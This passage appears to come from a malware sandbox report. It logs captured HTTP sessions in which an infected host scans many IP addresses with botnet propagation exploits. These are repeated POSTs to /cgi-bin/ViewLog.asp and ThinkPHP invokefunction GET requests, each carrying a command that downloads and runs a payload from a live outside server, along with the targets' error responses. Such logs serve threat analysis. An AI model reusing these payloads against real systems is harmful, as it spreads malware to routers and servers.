                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.313855886 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.217197895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.896075964 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:50.254112959 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:21.737905025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.233639231.136.98.618080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.418190956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.394159079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:23.313844919 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.217211008 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.896091938 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:50.254105091 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:21.737884998 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.234818694.120.250.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:20.457659006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.234916431.120.194.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.091720104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.398061991 CEST659INHTTP/1.0 404 Not Found !!!
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.233791431.136.178.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.100464106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:24.145560026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:30.288733006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:42.319063902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:07.403829098 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.2355594112.197.203.4080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.245021105 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:21.602237940 CEST339INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 21:37:21 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.235363285.214.45.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.402785063 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.717766047 CEST291INHTTP/1.1 404 Not Found
                                                        Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Sun, 14 Apr 2024 14:37:21 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.233924095.67.97.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.414619923 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.742503881 CEST446INHTTP/1.1 401 Unauthorized
                                                        Date: Sun, 14 Apr 2024 14:37:20 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Content-encoding: gzip
                                                        Connection: close
                                                        WWW-Authenticate: Basic realm="WF2409E"
                                                        user"
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.233882094.121.70.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.434715033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.234011631.128.217.2398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.482944965 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.845149994 CEST469INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/html; charset=utf-8
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        Strict-Transport-Security: max-age=3600
                                                        Content-Length: 130
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.235328088.208.223.8880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.532963037 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:21.821186066 CEST323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.234827888.198.52.8980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:21.547291040 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:21.854607105 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:37:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
